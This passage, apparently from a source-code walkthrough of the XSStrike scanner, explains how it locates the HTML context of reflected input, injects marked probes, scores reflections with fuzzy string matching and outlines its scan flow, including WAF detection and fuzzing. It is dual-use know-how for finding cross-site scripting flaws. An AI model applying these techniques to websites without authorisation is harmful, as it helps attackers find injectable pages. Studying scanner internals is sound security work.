        if(xsschecker.lower() in data.lower()):
            OCCURENCE_PARSED += 1
            if(OCCURENCE_PARSED == OCCURENCE_NUM):
                raise Exception("comment")
    def handle_startendtag(self, tag, attrs):
        ...
    def handle_starttag(self, tag, attrs):
        ...
    def handle_endtag(self, tag):       
        ...
    def handle_data(self, data):
        ...

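Take handle_comment as an example. When OCCURENCE_PARSED equals OCCURENCE_NUM, MyHTMLParser() has reached the reflection currently being examined, and it raises an exception that names the context, e.g. raise Exception("comment").

html_parse() then catches the exception and obtains the reflection's context from location = str(e).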
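
The exception-as-return-value pattern can be tried with Python 3's html.parser. This is a reduced sketch, not the author's class: it handles only the comment, html_data and attr contexts, uses a dedicated exception type instead of a bare Exception, and keeps its counters on the parser instance rather than in globals. Found, ContextParser and locate are hypothetical names.

```python
from html.parser import HTMLParser

XSSCHECKER = "d3v"


class Found(Exception):
    """Carries the context name out of the parser."""


class ContextParser(HTMLParser):
    def __init__(self, wanted):
        super().__init__()
        self.wanted = wanted  # 1-based index of the reflection to locate
        self.seen = 0         # reflections encountered so far

    def _hit(self, text, context):
        if XSSCHECKER in text.lower():
            self.seen += 1
            if self.seen == self.wanted:
                raise Found(context)  # abort parsing and report the context

    def handle_comment(self, data):
        self._hit(data, "comment")

    def handle_data(self, data):
        self._hit(data, "html_data")

    def handle_starttag(self, tag, attrs):
        for _, value in attrs:
            self._hit(value or "", "attr")


def locate(html, wanted):
    """Return the context of the wanted-th reflection, or '' if there is none."""
    try:
        ContextParser(wanted).feed(html)
    except Found as e:
        return str(e)
    return ""


sample = '<!-- d3v --><p>hello d3v</p><input value="d3v">'
print([locate(sample, n) for n in (1, 2, 3, 4)])
```

Raising from inside a handler stops the parse at the first relevant hit, which is why each reflection needs its own parser run.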

The HTML parser distinguishes the following contexts:

comment
script
attr
html_data
start_end_tag_attr

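test_param_check() - Checking the Response

test_param_check() is defined at line 296. After a special string is injected (a quote probe or a payload, for example), it uses the returned page to decide whether the XSS succeeded.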

def test_param_check(payload_to_check, payload_to_compare, OCCURENCE_NUM, url, param_data, GET, POST, action):
    check_string = 'XSSSTART' + payload_to_check + 'XSSEND' # We are adding XSSSTART and XSSEND to make
    compare_string = 'XSSSTART' + payload_to_compare + 'XSSEND' # the payload distinguishable in the response
    param_data_injected = param_data.replace(xsschecker, check_string)
    try:
        check_response = make_request(url, param_data_injected, GET, POST)
    except:
        check_response = ''
    success = False
    occurence_counter = 0 # Variable to keep track of which reflection is going through the loop
    # Itretating over the reflections
    for m in re.finditer('XSSSTART', check_response, re.IGNORECASE):
        occurence_counter = occurence_counter + 1
        efficiency = fuzz.partial_ratio(check_response[m.start():m.start()+len(compare_string)].lower(), compare_string.lower())
        if efficiency == 100:
            if action == 'do':
                ...
            if occurence_counter == OCCURENCE_NUM:
                success = True
            break
        
        if efficiency > 90:
            if action == 'do':
                ...
    return success

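check_string is the payload that is sent; because it travels over the network it is usually URL-encoded. compare_string is the payload as it is expected to appear in the returned HTML. Both are wrapped in XSSSTART and XSSEND so they are easy to locate later.

Once a reflection is located, fuzz.partial_ratio() computes the string similarity to test whether the XSS succeeded.

The official site describes XSStrike like this: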

But is XSS about copy pasting payloads? No. That's why XSStrike uses context breaking technique to automatically generate payloads and then uses levensthian algorithm to look for the payload in the web page to avoid false positives/negatives.

So the levensthian algorithm mentioned there is partial_ratio().
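
The marker-and-compare idea can be sketched in Python 3 with only the standard library. Note the substitution: difflib.SequenceMatcher is used here as a stand-in similarity measure; it is neither Levenshtein distance nor the same computation as fuzz.partial_ratio(), so the scores are only illustrative. reflection_scores is a hypothetical name.

```python
import re
from difflib import SequenceMatcher


def reflection_scores(response, expected_payload):
    """Score each XSSSTART... reflection against the expected payload (0-100)."""
    expected = ("XSSSTART" + expected_payload + "XSSEND").lower()
    scores = []
    for m in re.finditer("XSSSTART", response, re.IGNORECASE):
        # Compare a window of the same length as the expected string
        window = response[m.start():m.start() + len(expected)].lower()
        ratio = SequenceMatcher(None, window, expected).ratio()
        scores.append(round(100 * ratio))
    return scores


page = "a XSSSTART<lol>XSSEND b XSSSTART&lt;lol&gt;XSSEND"
scores = reflection_scores(page, "<lol>")
print(scores)
```

The first reflection is echoed verbatim and scores 100, while the HTML-encoded one scores lower, which is the distinction test_param_check() relies on.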

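Summary

The execution flow of XSStrike:

Program initialization
input() program entry
1. param_parser() parameter parsing
2. initiator() XSS scan
  1. paramfinder() hidden parameter discovery
  2. GET/POST
    1. WAF_detector() WAF detection
    2. WAF present or not
      1. Present
        fuzzer()
      2. Not present
        filter_checker()
        locater()
        scan_occurence()
        inject()
        test_param_check() special character checks
        test_param_check() payload injection checks
        Manual check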